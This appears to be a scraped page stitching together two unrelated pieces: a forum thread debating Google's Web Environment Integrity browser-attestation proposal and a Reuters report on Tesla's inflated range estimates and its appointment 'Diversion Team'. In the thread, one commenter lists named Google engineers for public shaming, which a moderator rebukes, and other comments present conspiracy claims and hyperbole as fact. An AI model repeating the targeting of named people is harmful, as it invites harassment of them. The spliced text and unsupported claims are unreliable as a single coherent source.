We are capable of going to elsewhere to free and open access to information, and we would be better off spending our energy on positively influencing others to follow us in that direction. They can't take away tcp, http, ftp, irc and all the other protocols that these megaliths have built their empires on, and we can still use those tools even if it's a demoralizing regression to move back to the basics. Giants like google, Amazon and others depend on our unwillingness to rebuild. Let's use our efforts and our ingenuity to show them that they've underestimated us.
We have the tools, we have the knowledge. Let's be builders instead of petty complainers.
Oh but that would be against the respective projects' code of conduct. /s
> constantly and relentlessly shame and even harass all those involved in helping create it
Not on HN, please. I realize that you're trying to protect something you care about (and that maybe we all care about) but this leads to ugly mob behavior that we don't want and won't allow here.
> constantly and relentlessly shame and even harass all those involved in helping create it
If this ever helped, we wouldn't have absolutely unethical products created. Turns out people's morals have a price tag, that Google and others are willing to pay their employees.
Imo, the idea that this is about selling advertising and maintaining market share is being used as a false justification. This is not about being able to drive users to ads.
The bigger picture is that Google et al are actually part of the control structure. The governance system wants deanonymised Internet. Corporate interests are how this is being promoted - government legislation would be a harder pill for the masses to accept.
But all the recent mega changes tell us (Elon buying twitter, etc) tell us that this is on the way. Apparent anonymous internet will be sandboxed. Knowing everything about everyone all the time, and having that data being crunched by ai's is an amazing, audacious goal, that seems close to being achieved.
Just saw https://github.com/chromium/chromium/pull/187/files
It's even funnier with the auto-reply 'Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA).'
what exactly do you want to preserve from the web as we know it today?
let it burn
focus on building something new, new protocols, new networks, new browsers
Corporations will dismiss all of that as asshole Luddites, and do it anyway. You're not Google's customer. The advertisers are.
The only way to stop Google from treating the Web as their own OS is to take that power away from them, by switching to other browser engines.
Ah yes. The 'Uncle Ted' approach, but a bit more mild. At what point do we go full Ted?
Tiktok is literally controlled by the CCP. If consumers don't care about that, they aren't going to care about DRM.
fwiw I found Vivaldi's overview a good primer on the situation.
https://vivaldi.com/blog/googles-new-dangerous-web-environme...
Interesting and it made me try out Vivaldi. Ten minutes later I had lost trust in their claim of privacy.
It uses Microsoft Edge while installing to open links - like the link to their privacy policy - while the OS is set to use Firefox (and every other app use this). Then I found out that it has zero containerization features at all. Don't want Google cookies from one tab read in another tab? Use a new Private Window. No thanks. Uninstall, and then it used Edge to open a page asking why...
Thanks. Let's discuss that article here: https://news.ycombinator.com/item?id=36875940.
Apple would be in the position to fight this.
'Apple already shipped attestation on the web, and we barely noticed'
All of the major tech companies are in on this. Google and Apple already deployed it for their phone and desktop platforms (iOS, Android, macOS, ChromeOS, all support attestation already). Microsoft is getting there with Windows 11, and all new devices shipping since ~2015 have the hardware support. Google is now closing the gap on desktop browsers.
Soon the percentage of people supporting it will be high enough to make it mandatory - the last 5% can just get a new device or something like that. They'll do it when their bank website tells them so.
The day Cloudflare flips the switch to require it for all connections is the day the open web dies.
apple is one of the bad guys before the bad guys know they're bad guys..they already implemented this stuff
Is there no EU regulation against this?
Careful, with the right arguments from Google the EU might just make this mandatory in the name of 'security'.
The EU is at the forefront of wanting only 'real people' online. So no, if anything digital identity is squarely within what would appease the EU
I've heard time and time again how this is 'the end of the free web'. Can someone succinctly explain how this is the case, for somebody not familiar with web browser architecture? What does WEI provide that wasn't previously possible?
Actually the free web ended with net neutrality. Didn't you notice when that happened?
Future web will require you to have certified browser - Chrome TM, to access the web. It will require certified OS WindowsTM, running on trusted Hardware TPMTM, running trusted firmware CIATM.
You'll have no choice and your love will be mandatory.
This won't stop malware of course. However a skull clamp will be installed to monitor your thoughts and you will be zapped if undesirable thoughts are detected.
Note: it's a hyperbole but if you want another OS, Browser or hardware you'll be forced to Homebrew it. Or use a compromised app.
I wish Google would solve real developer pain points like having secure client side storage. That would be useful to developers. But heaven forbid they take a break for a moment from trying to squeeze every ounce of profit out of their users.
In order to have secure client-side storage, it seems like you would need to be able to verify that the client-side application that is accessing it is unmodified -- which is what WEI would allow for.
One of the proposals for WEI is to make it probabilistically fail.
Ie. on a given device, for 10% of websites, WEI pretends to be unsupported.
That means websites can't deny service where WEI is unsupported. Yet it still allows statistical analysis across bulk user accounts.
If WEI was implemented like this, I would support it as being good for the web ecosystem.
This is the bait to make it sound reasonable. Of course this hold-back feature will be quietly disabled at some point in the future. The whole proposal is full of weaselly half truths and misrepresentation about their real plans
The attitude from Google towards this has changed significantly over the last few days (unsurprisingly).
From the 'explainer': 'we are evaluating whether attestation signals must sometimes be held back [...] However, a holdback also has significant drawbacks [...] a deterministic but limited-entropy attestation [i.e. no holdback] would obviate the need for invasive fingerprinting'.
From the Google worker's most recent comment on the issue: 'WEI prevents ecosystem lock-in through hold-backs [...] This is designed to prevent WEI from becoming "DRM for the web"'
So, in other words, WEI could be used to prevent fingerprinting, but won't be able to if holdback is introduced -- 5-10% of clients would still get fingerprinted.
Looking at the list of 'scenarios where users depend on client trust', all of them would be impacted by a holdback mechanism:
- Preventing ad fraud: not for the holdback group
- Bot and sockpuppet accounts on social media: not for the holdback group
- Preventing cheating in games: not for the holdback group -- and thus not for anyone playing against someone in the holdback group
- Preventing malicious software that imitates a banking app: not for the holdback group
In other words, if there was holdback, WEI would require places which currently fingerprint to retain and maintain the fingerprinting code and apply it to fewer users, in the best case, or would be completely useless in the worst case (for things like games).
However, it's also quite interesting to look at the implications of successfully attesting a browser which supports arbitrary extensions:
- Preventing ad fraud: install an automation extension
- Bot and sockpuppet accounts: as above
- Cheating in games: install an extension which allows cheating
- Malicious software which imitates a banking app: a malicious browser extension could do this easily.
In other words, unless you attest the browser with its extensions, none of the trust scenarios outlined in the explainer are actually helped by WEI. It's not obvious whether the Google employee who wrote this deliberately didn't think about these things, or whether the 'explainer' is just a collection of unconnected ideas, but it doesn't appear to hold together.
It is not surprising that the first target of WEI -- Chrome on Android -- does not support extensions.
That's a silly proposal that will eventually be turned off as it causes issues. Users will complain that sometime websites are broken for no reason and the first proposed fix would be to turn the failure probability to zero. Then the zero failure setting will become the default.
And what guarantees do you have that the probabilistic failure rate won't be turned to 0 at some point in the future?
Except for Google's pinky swear, I mean.
Here's how this goes:
WEI randomly fails, website sees it, has never implemented any error checking (or fails on purpose without WEI), WEI becomes effectively mandatory.
Google is a gun manufacturer telling people on the other end of it 'don't worry, every one in 20 bullets doesn't fire'.
That's currently just an idea in the 'Open questions' section of the spec, but there is already pushback against it from others closely involved in the spec & discussion around this (https://github.com/RupertBenWiser/Web-Environment-Integrity/...) and notably the attestation feature Google already shipped on Android for native apps in the same situation does _not_ do this.
If you have 50% of people having adblock then websites loosing 10% of traffic because of WEI probabilistically fail it still seems like win for big tech if they force user to their approved unmodified OS/browser.
The antifraud company that worked with Google on the WEI proposal is already calling for the removal of holdouts from the spec[0], because:
- Attestation does not work as an antifraud signal unless it is mandatory - fraudsters will just pretend to be a browser doing random holdout otherwise.
- The banks that want attestation do not want you using niche browsers to login to their services.
[0] https://github.com/RupertBenWiser/Web-Environment-Integrity/...
I was watching a video about nesting in CSS and how it's just in Chrome and comments were all about how cool it is and how they can't wait to use it, and so on, and so forth. I think it's quite a representative example: we can do that much better with SASS today, but I guess Google needs to keep features pushing at full speed so no one else can keep up.
We developers are so gullible. Just give us some shiny things and we don't even realize they're heating up the pan.
> I was watching a video about nesting in CSS and how it's just in Chrome
Nested CSS is supported in the latest version of all major browsers.
Mozilla should call for Google's removal from the W3C over this implementation of Web Environment Integrity. 'But Chrome has 65% market share, what good is the W3C without them?" If Google can take unilateral action to fundamentally change the basic principles of the web, then the W3C is already useless. This will give Google a clear choice: if they want to maintain the idea that the W3C matters, they should withdraw this implementation.
It is unbelievable that over the course of 3 days, the potential future of the web has been put in such dire straits. There's already an existing, far less troubling (while still bad), proposal in the form of Private Access Tokens going through a standards committee that Google chose to ignore. They presented this proposal in the shadiest way possible through a personal GitHub account. They immediately shut down outside contribution and comments. And despite the blowback they are already shoving a full implementation into Chromium.
What we need is real action, and this is the role Mozilla has always presented itself as serving. A 'true' disinterested defender of the ideals of the web. Now is the time to prove it. Simply opposing this proposal isn't enough. This is about as clear and basic an attack on what fundamentally differentiates the web from every walled garden as possible. If someone drafted a proposal to the W3C that stated that only existing browsers should be allowed to render web pages, the correct response would not be to 'take the stance that you oppose that proposal,' it would be to seriously question whether the submitting party should even participate in the group. Make no mistake, that is what is happening now.
It didn't happen when Apple did it with Safari (and you all were quiet as a mouse as well, with HN actively defending Apple Safari monopoly with this feature enabled)... so why would NOW be any different?
> It is unbelievable that over the course of 3 days, the potential future of the web has been put in such dire straits.
'Move fast and break things.' How many here used to cheer this approach?
Good luck getting anything from Mozilla, Google is their largest source of revenue by far. Over half.
It's far, far too late for this. The W3C is already irrelevant, not that it ever mattered much.
The internet is made by big companies. Not standards bodies. The WHATWG has the actual living standards, and Google, Apple, Cloudflare and Amazon make the actual software. Nobody cares about the W3C. And Mozilla is long past dead.
When Google announced the EME DRM in the semi-public W3C HTML working group, it created a massive backlash. So W3C moved the EME spec under a new, closed, invite-only working group, and then announced that there is a consensus among everyone (there), and it can move forward to become a recommendation. They didn't even fix known bugs in the spec written by Google (e.g. architecture diagram in the EME spec is factually incorrect).
So I don't think this rubber-stamping W3C will do anything. They have no power over Google, and they know it.
Quite frankly, the W3C stopped having any say on the matter when the WHATWG supplanted the XHTML standard with the HTML5 committee.
They had enough weight at the time to say 'The Web is XHTML2, you can make your own internet if you want ' compared to what they can bargain for these days.
Maybe at the time it was a somewhat reasonable decision to abdicate their responsibility over to big internet companies, but that's what brought us to the current state where we're basically going back to original version of The Microsoft Network[1].
> If Google can take unilateral action to fundamentally change the basic principles of the web, then the W3C is already useless. This will give Google a clear choice: if they want to maintain the idea that the W3C matters, they should withdraw this implementation.
It's pretty generally accepted that the correct way to do web standardization is for proponents of some new thing to implement that thing and deploy it and then once it has been shown to actually work bring a spec to the the standards folks for standardization.
That usually works fairly well, although sometimes if that first pre-standard implementation does too well the original implementor may have trouble replacing theirs with something that follows whatever standard is eventually approved, because there are often significant changes made during the standardization process.
An example of that would be CSS grid layout. That was a Microsoft addition to IE 10, behind a vendor prefix of -ms-. Nearly everyone else liked it and it was standardized but with enough differences from Microsoft's original that you couldn't just remove the -ms- prefixes from your CSS and have it work great with the now standard CSS grid.
It was 4.5 years between the time Microsoft first deployed it in IE 10 and it appearing in other browsers by default (Chrome had it within a year of Microsoft, and Firefox had it about two years after that, but both as an experimental feature the user had the specifically enable). In that 4.5 years enough sites that only cared about IE were using the -ms- form that Microsoft ended up stuck with that on IE 10 and 11 instead of the standard.
There is no chance Mozilla does anything that actually matters here. They may do some virtue signaling and put out a statement about how they support the open web but nothing more.
Can you give me an idea as to why WEI is a bad idea for the web? Granted, it is morning, but as I am going through the notes linked ( https://googlechrome.github.io/OriginTrials/developer-guide.... ), I am not sure I understand why it is that bad.
As a general rule of thumb, web technology has traditionally separated the content and protocol from the browser ('user agent') in terms of concerns. By which I mean, a user agent needs to be able to handle any possible input without breaking, and a web server needs to be able to handle any possible request without breaking.
WEI tries to shortcut that process by creating a secured sign-off system that would allow the server to only respond to queries from a blessed hardware and software configuration. This wildly constrains the user agents that would be possible. The pro for web developers is that they wouldn't have to concern themselves with whether their server or the HTML they are. Emitting is broadly standards compliant and compatible; they can just make sure it works with the target platforms they care about and rest easy knowing no other platforms can touch their system. But this is bad for anybody who, for whatever reason, can't use the blessed platforms (user agent and hardware combinations).
Immediate practical consequences are that a lot of the screen reader solutions people use would probably break (because the screen readers wouldn't be certified user agents), a lot of clever hacks would be far less feasible (the website somebody hacked together to track whether the ice cream machine was broken at McDonald's restaurants relied upon being able to pretend it was the McDonald's smartphone app well enough to attempt to put ice cream in the shopping bag), and it would basically become impossible to build a new browser or operating system from scratch compatible with the web (they wouldn't work with the websites people wanted to use because they wouldn't be certified as authentic on any of those sites).
This proposal grossly changes the balance of power on how the web works and places most of it in the hands of the incumbent browser and computer hardware vendors.
Basically aims to make desktop browsers work like non-jailbroken iPhones: locked down and outside the user's control, for better and worse. You could also compare it to client-side anticheat in PC games.
Can somebody explain what are the practical implications of this?
You'll need an 'approved' browser and potentially 'approved' hardware to access the web. Since Cloudflare is on this too, most of the web will be locked for anyone who doesn't use mainstream hardware.
From a very top level view, this gives Google, and other websites, the ability to block requests from devices/browsers they don't approve.
This implements device level verification of the code running your browser. If the device identifies as something Google, or other implementing websites, don't approve, you'll get an error similar to how you see 404 errors for missing/wrong links.
Unblockable ads, sites can serve you data that you can't manipulate or copy, micropayments can exist, invasive surveillance.
Surveillance is possibly the worst of the bunch. They say it's just to do a better job of serving ads, but that's only the tip of the iceberg. Governments could easily use it to know and track everything you do online. Just wait till the next elected nut job wants a list of everybody that has ever looked at or searched for a certain type of information, maybe they don't like that you looked up info on abortions or lgbt info, now they can know the full extent of what you saw and when.
Ads will be worse. You think YouTube ads are bad now, just wait till you can't visit any page without the mandatory viewing of their ads. They can require a cam installed to make sure your eyes are on the ad, helpfully pausing the video when you look away.
The Browser application needs to pass a binary image check, and if the browser hash doesn't match Google database, you cannot proceed to the website (since your browser may be corrupted). A major big deal for non main-stream browser, and for non Google browser developers, extension developers (eg. AdBlock), etc. In summary, some websites (like banks, Netflix, etc) will no longer be available for non mainstream browser users. Also, even if you're using Google Chrome, you may need to run the latest version to satisfy the hash check. Every day, the number of broken websites will continue growing until all non Google Chrome users have a blocked internet.
Nothing will happen. People have been making the same complaints about every new crypto standard for decades, and yet here we are. TPMs are a thing, EME has been around for over a decade now, DRM on the web is as pervasive as it's ever going to get, and yet no one's user experience is any worse than it was before these technologies existed.
ENORMOUS fingerprinting potential and capability to disrupt the user's ability to block content. Or access it.
To turn your browser (an agent acting on your behalf) into a proprietary application (an agent acting on behalf of a website) -- i.e. the equivalent of forcing you to install a proprietary application in order to visit a website.
This is essentially a backdoor attempt to TiVoize[0] web browsers. The only difference is that, instead of directly using hardware to prevent you from running a modified browser, the intent is to use network effects to accomplish the same thing.
If adopted by publishers, the web will be closed to everyone but allowed browsers on allowed OSes on allowed hardware. No ad blockers, no extensions, no customizations beyond what the few chosen browsers allow explicitly.
I've been holding on to my Firefox installation after switching back around ~2016 or so. I was on the Chrome bandwagon when they were the upstart (still have the comic from the launch!) but it didn't take long to see how dangerous things were getting with monoculture.
If you want to help, push back on all the anti-Firefox rhetoric that amplifies every little misstep that they take. Firefox is so much better from a user-respect perspective and the vitriol over little things (a couple of anonymous, tracking-free sponsored links on a new tab page?) are losing the plot.
Maybe they shouldn't have added the Pocket links if they didn't want the vitriol. Tracking or not (I'm still not 100% convinced that they're not), it doesn't look good when your browser greets you with that stuff. It's like entering a neighborhood and seeing a 'checks cashed' store.
this is where you should vote with your wallet and feet. and I think it's not really a stretch to ask Google's engineers who work on chrome/ium to get a job somewhere else.
I think it would be interesting to get their views on it. I wouldn't be surprised if a lot think this is a good idea. Not that I agree, but I think it's unlikely that everyone sees it the same way as those outside the organisation.
The web is not dying, it is being killed. And the people that are killing it have names and addresses.
Shame on Rayan Kanso <[email protected]>
Shame on Peter Pakkenberg <[email protected]>
Shame on Dmitry Gozman <[email protected]>
Shame on Richard Coles <[email protected]>
Shame on Kinuko Yasuda <[email protected]>
Shame on Rupert Ben Wiser: https://github.com/RupertBenWiser/Web-Environment-Integrity
Google needs to be broken up.
No personal attacks, please. It's not what this site is for, and destroys what it is for.
You can make your substantive points without that, as most other users in this thread have been doing.
You may not owe web-destroying $MegaCorp better, but you owe this community better if you're participating in it.
Currently development and standardization occurs in the open, on GitHub and elsewhere. When it's decided that's no longer possible, I hope you realize that this kind of targeted harassment is what led to its demise.
Shame on all knowledgeable people that happily keep using Chrome and giving Google money. That make the web more centralized by giving more and more power to entities that benefit from this like CloudFlare.
HN is full of people that are indirectly helping to push these changes forward. You're preaching to the choir, and the choir is too lazy to switch browsers or learn how to configure a web server, so they just shrug and carry on.
I predict that hardware attestation will in 10-30 years become a requirement to maintain an internet connection.
Given Microsoft's push to make their OS support hardware attestation as well as Google's push for technologies which use hardware attestation in broader and broader scopes (Android and iOS has supported this for apps for a long time), the technology to make this possible is increasingly becoming widespread.
Hardware which supports hardware attestation is expensive and some people who can't afford it would therefore be excluded. But I don't think this matters.
If Google forces you to see all their ads then they can sell the ad space for more money. This can make it increasingly profitable to sell devices at an ever increasing loss. Likewise for Microsoft.
As a side note, this will make it incredibly difficult for anyone to compete in the hardware space. Why would someone spend even £500 on a phone or computer from a non adtech company when the adtech company can sell the same device for £100 or £50 or maybe even give it away for free?
By making hardware attestation more mainstream, it will become increasingly difficult to argue that enabling it for things would cut off customers.
I think it's easy to argue in favor of requiring hardware attestation for internet connections from the point of view of a government or an ISP. After all, if your customers can only use a limited set of hardware which is known and tested for security, it decreases the chance of security problems. For a police state like the UK it also seems even easier to justify too.
Even if things don't go that far, in a few years you will become a second class citizen for refusing to allow this on your devices. I can easily imagine banks requiring WEI for their online banking portals (they already do it for all their apps). Likewise I can also imagine my water, gas and electricity companies, or really any company which handles payments, considering this technology.
The worst part is, I don't think most people will care as long as it keeps working seamlessly on their devices. Likewise I don't think governments or the EU will do anything about it. I am not even sure what I can do about it.
> I predict that hardware attestation will in 10-30 years become a requirement to maintain an internet connection.
I fear you're right. But if the current trends keep up, I'll have abandoned the internet entirely before that happens.
I mourn for what we have already lost, and we are poised to lose even more.
> I predict that hardware attestation will in 10-30 years become a requirement to maintain an internet connection.
What you fail to take into account, is that geeks like being able to freely goof around with stuff; and that new disruptive tech evolves precisely in the ecosystems where geeks are goofing around with stuff.
Consider the dichotomy between iPadOS and macOS. macOS still exists — and still has things like the ability to disable Gatekeeper, enable arbitrary kernel-extension installation, etc. — because the geeks inside Apple could never be productive developing an OS on a workstation that is itself a sealed appliance. They need freely-modifiable systems to hack on. And they may as well sell other people those free systems they've developed — with defaults that make the tool appliance-esque, sure, but also with clear paths to turning those safeties off.
The same thing was true in the 90s with the rise of walled-garden ISPs. The average consumer might be happy with just having access to e.g. AOL, but the people who work with computers (including the programmers at AOL!) won't be happy unless they can write a program that opens a raw IP socket and speaks to another copy of that program on their friend's computer halfway around the world. And so, despite not really mentioning as a feature, every walled-garden ISP did implicitly connect you to the 'raw' Internet over PPP, rather than just speaking to the walled-garden backend BBS-style — because that's what the engineers at each ISP wanted to happen when they used their own ISP, and they weren't going to tolerate anything less.
And then, gradually, all the most interesting stuff for consumers on the Internet — all the 'killer apps' — started being things you could only find the 'raw' web, rather than in these walled gardens — precisely because the geeks that knew how to build this stuff, had enthusiasm for building it as part of the open web, and no enthusiasm for building it as part of a walled-garden experience. (I would bet money that many a walled-garden developer had ideas for Internet services that they wrote down at work, but then implemented at home — maybe under a pseudonym, to get out from under noncompetes.)
Even if there comes about an 'attested Internet', and big companies shift over to using it, all the cool new stuff will always be occurring off to the side, on the 'non-attested Internet.' You can't eliminate the 'non-attested Internet' for the same reason that you can't develop an Operating System purely using kiosk computing appliances.
The next big killer app, after the 'attested Internet' becomes a thing, will be built on the 'non-attested Internet.' And then what'll happen? Everyone will demand an Internet plan that includes access to the 'non-attested Internet', if that had been something eliminated in the interrim. (Which it wouldn't have been, since all the engineers at the ISPs would never have stood for having their own Internet connections broken like that.)
Is Brave browser safe from this considering it uses Chromium?
I guess they could un-cherrypick this 'feature', but that doesn't mitigate google or publishers requiring a response from this API, in order to serve a request.
Not sure how exactly ad fraud works but why this WEI supposed to even prevent it? There are many tools that allow to control your mouse and keyboard programatically like pyautogui [0].
Will OS check if such python lib is installed or script running in the background? Then those that doing ad fraud will move to programmable board as BLE keyboard/mouse/hid. Even microbit can can be programmed as BLE HID device [1]. Add external camera on unattested device that will stare at attested device screen and you can automate lots of thing. Sure this is more complicated to pull off but will probably eventually happen anyway if this is a lucrative business.
In the end WEI wouldn't prevent ad fraud / fakes but would end up used for restricting other things.
> Will OS check if such python lib is installed
Most computers come with a trusted platform module which increasingly runs more and more services related to media handling. On modern Macs the T2 chip is an A8 or A9, meaning it has the same power of a modern iPhone and handles everything from device input (mouse & keyboard), to webcam decoding to media decoding. When you watch netflix on a modern macbook, the video buffer that is displayed is actually a shared memory buffer from the T2 chip, which the main SoC can't actually see. If you take a screenshot you will see that the screen stays black, since audio and video come purely from the chip.
You could run a Browsers Renderer in there and you would never notice.
Not a lawyer but this seems ripe for antitrust action. Microsoft got sued back in the 2000's for simply bundling IE with their operating system. The behavior of Google (and quite frankly Microsoft with Edge) seems way way worse than whatever MS was doing when they got sued.
But MS still bundles IE, and they've gotten more pushy about it lately.
825 points 5 days ago by mfiguiere in 181st position
www.reuters.com | Estimated reading time – 17 minutes | comments | anchor
AUSTIN, Texas
In March, Alexandre Ponsin set out on a family road trip from Colorado to California in his newly purchased Tesla, a used 2021 Model 3. He expected to get something close to the electric sport sedan's advertised driving range: 353 miles on a fully charged battery.
He soon realized he was sometimes getting less than half that much range, particularly in cold weather – such severe underperformance that he was convinced the car had a serious defect.
"We're looking at the range, and you literally see the number decrease in front of your eyes," he said of his dashboard range meter.
Ponsin contacted Tesla and booked a service appointment in California. He later received two text messages, telling him that "remote diagnostics" had determined his battery was fine, and then: "We would like to cancel your visit."
What Ponsin didn't know was that Tesla employees had been instructed to thwart any customers complaining about poor driving range from bringing their vehicles in for service. Last summer, the company quietly created a "Diversion Team" in Las Vegas to cancel as many range-related appointments as possible.
The Austin, Texas-based electric carmaker deployed the team because its service centers were inundated with appointments from owners who had expected better performance based on the company's advertised estimates and the projections displayed by the in-dash range meters of the cars themselves, according to several people familiar with the matter.
Inside the Nevada team's office, some employees celebrated canceling service appointments by putting their phones on mute and striking a metal xylophone, triggering applause from coworkers who sometimes stood on desks. The team often closed hundreds of cases a week and staffers were tracked on their average number of diverted appointments per day.
Managers told the employees that they were saving Tesla about $1,000 for every canceled appointment, the people said. Another goal was to ease the pressure on service centers, some of which had long waits for appointments.
In most cases, the complaining customers' cars likely did not need repair, according to the people familiar with the matter. Rather, Tesla created the groundswell of complaints another way – by hyping the range of its futuristic electric vehicles, or EVs, raising consumer expectations beyond what the cars can deliver. Teslas often fail to achieve their advertised range estimates and the projections provided by the cars' own equipment, according to Reuters interviews with three automotive experts who have tested or studied the company's vehicles.
Neither Tesla nor Chief Executive Elon Musk responded to detailed questions from Reuters for this story.
Tesla years ago began exaggerating its vehicles' potential driving distance – by rigging their range-estimating software. The company decided about a decade ago, for marketing purposes, to write algorithms for its range meter that would show drivers "rosy" projections for the distance it could travel on a full battery, according to a person familiar with an early design of the software for its in-dash readouts.
Then, when the battery fell below 50% of its maximum charge, the algorithm would show drivers more realistic projections for their remaining driving range, this person said. To prevent drivers from getting stranded as their predicted range started declining more quickly, Teslas were designed with a "safety buffer," allowing about 15 miles (24 km) of additional range even after the dash readout showed an empty battery, the source said.
The directive to present the optimistic range estimates came from Tesla Chief Executive Elon Musk, this person said.
"Elon wanted to show good range numbers when fully charged," the person said, adding: "When you buy a car off the lot seeing 350-mile, 400-mile range, it makes you feel good."
Tesla's intentional inflation of in-dash range-meter projections and the creation of its range-complaints diversion team have not been previously reported.
Driving range is among the most important factors in consumer decisions on which electric car to buy, or whether to buy one at all. So-called range anxiety – the fear of running out of power before reaching a charger – has been a primary obstacle to boosting electric-vehicle sales.
At the time Tesla programmed in the rosy range projections, it was selling only two models: the two-door Roadster, its first vehicle, which was later discontinued; and the Model S, a luxury sport sedan launched in 2012. It now sells four models: two cars, the 3 and S; and two crossover SUVs, the X and Y. Tesla plans the return of the Roadster, along with a "Cybertruck" pickup.
Reuters could not determine whether Tesla still uses algorithms that boost in-dash range estimates. But automotive testers and regulators continue to flag the company for exaggerating the distance its vehicles can travel before their batteries run out.
Tesla was fined earlier this year by South Korean regulators who found the cars delivered as little as half their advertised range in cold weather. Another recent study found that three Tesla models averaged 26% below their advertised ranges.
The U.S. Environmental Protection Agency (EPA) has required Tesla since the 2020 model year to reduce the range estimates the automaker wanted to advertise for six of its vehicles by an average of 3%. The EPA told Reuters, however, that it expects some variation between the results of separate tests conducted by automakers and the agency.
Data collected in 2022 and 2023 from more than 8,000 Teslas by Recurrent, a Seattle-based EV analytics company, showed that the cars' dashboard range meters didn't change their estimates to reflect hot or cold outside temperatures, which can greatly reduce range.
Recurrent found that Tesla's four models almost always calculated that they could travel more than 90% of their advertised EPA range estimates regardless of external temperatures. Scott Case, Recurrent's chief executive, told Reuters that Tesla's range meters also ignore many other conditions affecting driving distance.
Electric cars can lose driving range for a lot of the same reasons as gasoline cars — but to a greater degree. The cold is a particular drag on EVs, slowing the chemical and physical reactions inside their batteries and requiring a heating system to protect them. Other drains on the battery include hilly terrain, headwinds, a driver's lead foot and running the heating or air-conditioning inside the cabin.
Tesla discusses the general effect of such conditions in a "Range Tips" section of its website. The automaker also recently updated its vehicle software to provide a breakdown of battery consumption during recent trips with suggestions on how range might have been improved.
Tesla vehicles provide range estimates in two ways: One through a dashboard meter of current range that's always on, and a second projection through its navigation system, which works when a driver inputs a specific destination. The navigation system's range estimate, Case said, does account for a wider set of conditions, including temperature. While those estimates are "more realistic," they still tend to overstate the distance the car can travel before it needs to be recharged, he said.
Recurrent tested other automakers' in-dash range meters – including the Ford Mustang Mach-E, the Chevrolet Bolt and the Hyundai Kona – and found them to be more accurate. The Kona's range meter generally underestimated the distance the car could travel, the tests showed. Recurrent conducted the study with the help of a National Science Foundation grant.
Tesla, Case said, has consistently designed the range meters in its cars to deliver aggressive rather than conservative estimates: "That's where Tesla has taken a different path from most other automakers."
Failed tests and false advertising
Tesla isn't the only automaker with cars that don't regularly achieve their advertised ranges.
One of the experts, Gregory Pannone, co-authored a study of 21 different brands of electric vehicles, published in April by SAE International, an engineering organization. The research found that, on average, the cars fell short of their advertised ranges by 12.5% in highway driving.
The study did not name the brands tested, but Pannone told Reuters that three Tesla models posted the worst performance, falling short of their advertised ranges by an average of 26%.
The EV pioneer pushes the limits of government testing regulations that govern the claims automakers put on window stickers, the three automotive experts told Reuters.
Like their gas-powered counterparts, new electric vehicles are required by U.S. federal law to display a label with fuel-efficiency information. In the case of EVs, this is stated in miles-per-gallon equivalent (MPGe), allowing consumers to compare them to gasoline or diesel vehicles. The labels also include estimates of total range: how far an EV can travel on a full charge, in combined city and highway driving.
"They've gotten really good at exploiting the rule book and maximizing certain points to work in their favor involving EPA tests."
EV makers have a choice in how to calculate a model's range. They can use a standard EPA formula that converts fuel-economy results from city and highway driving tests to calculate a total range figure. Or automakers can conduct additional tests to come up with their own range estimate. The only reason to conduct more tests is to generate a more favorable estimate, said Pannone, a retired auto-industry veteran.
Tesla conducts additional range tests on all of its models. By contrast, many other automakers, including Ford, Mercedes and Porsche, continue to rely on the EPA's formula to calculate potential range, according to agency data for 2023 models. That generally produces more conservative estimates, Pannone said.
Mercedes-Benz told Reuters it uses the EPA's formula because it believes it provides a more accurate estimate. "We follow a certification strategy that reflects the real-world driving behavior of our customers in the best possible way," the German carmaker said in a statement.
Ford and Porsche didn't respond to requests for comment.
Whatever an automaker decides, the EPA must approve the window-sticker numbers. The agency told Reuters it conducts its own tests on 15% to 20% of new electric vehicles each year as part of an audit program and has tested six Tesla models since the 2020 model year.
EPA data obtained by Reuters through the Freedom of Information Act showed that the audits resulted in Tesla being required to lower all the cars' estimated ranges by an average of 3%. The projected range for one vehicle, the 2021 Model Y Long Range AWD (all-wheel drive), dropped by 5.15%. The EPA said all the changes to Tesla's range estimates were made before the company used the figures on window stickers.
The EPA said it has seen "everything" in its audits of EV manufacturers' range testing, including low and high estimates from other automakers. "That is what we expect when we have new manufacturers and new technologies entering the market and why EPA prioritizes" auditing them, the agency said.
The EPA cautioned that individuals' actual experience with vehicle efficiency might differ from the estimates the agency approves. Independent automotive testers commonly examine the EPA-approved fuel-efficiency or driving range claims against their own experience in structured tests or real-world driving. Often, they get different results, as in the case of Tesla vehicles.
Pannone called Tesla "the most aggressive" electric-vehicle manufacturer when it comes to range calculations.
"I'm not suggesting they're cheating," Pannone said of Tesla. "What they're doing, at least minimally, is leveraging the current procedures more than the other manufacturers."
Jonathan Elfalan, vehicle testing director for the automotive website Edmunds.com, reached a similar conclusion to Pannone after an extensive examination of vehicles from Tesla and other major automakers, including Ford, General Motors, Hyundai and Porsche.
All five Tesla models tested by Edmunds failed to achieve their advertised range, the website reported in February 2021. All but one of 10 other models from other manufacturers exceeded their advertised range.
Tesla complained to Edmunds that the test failed to account for the safety buffer programmed into Tesla's in-dash range meters. So Edmunds did further testing, this time running the vehicles, as Tesla requested, past the point where their range meters indicated the batteries had run out.
Only two of six Teslas tested matched their advertised range, Edmunds reported in March 2021. The tests found no fixed safety buffer.
Edmunds has continued to test electric vehicles, using its own standard method, to see if they meet their advertised range estimates. As of July, no Tesla vehicle had, Elfalan said.
"They've gotten really good at exploiting the rule book and maximizing certain points to work in their favor involving EPA tests," Elfalan told Reuters. The practice can "misrepresent what their customers will experience with their vehicles."
South Korean regulators earlier this year fined Tesla about $2.1 million for falsely advertised driving ranges on its local website between August 2019 and December 2022. The Korea Fair Trade Commission (KFTC) found that Tesla failed to tell customers that cold weather can drastically reduce its cars' range. It cited tests by the country's environment ministry that showed Tesla cars lost up to 50.5% of the company's claimed ranges in cold weather.
The KFTC also flagged certain statements on Tesla's website, including one that claimed about a particular model: "You can drive 528 km (328 miles) or longer on a single charge." Regulators required Tesla to remove the "or longer" phrase.
Korean regulators required Tesla to publicly admit it had misled consumers. Musk and two local executives did so in a June 19 statement, acknowledging "false/exaggerated advertising."
Creating a diversion
By last year, sales of Tesla's electric vehicles were surging. The company delivered about 1.3 million cars in 2022, nearly 13 times more than five years before.
As sales grew, so did demand for service appointments. The wait for an available booking was sometimes a month, according to one of the sources familiar with the diversion team's operations.
Tesla instructs owners to book appointments through a phone app. The company found that many problems could be handled by its "virtual" service teams, who can remotely diagnose and fix various issues.
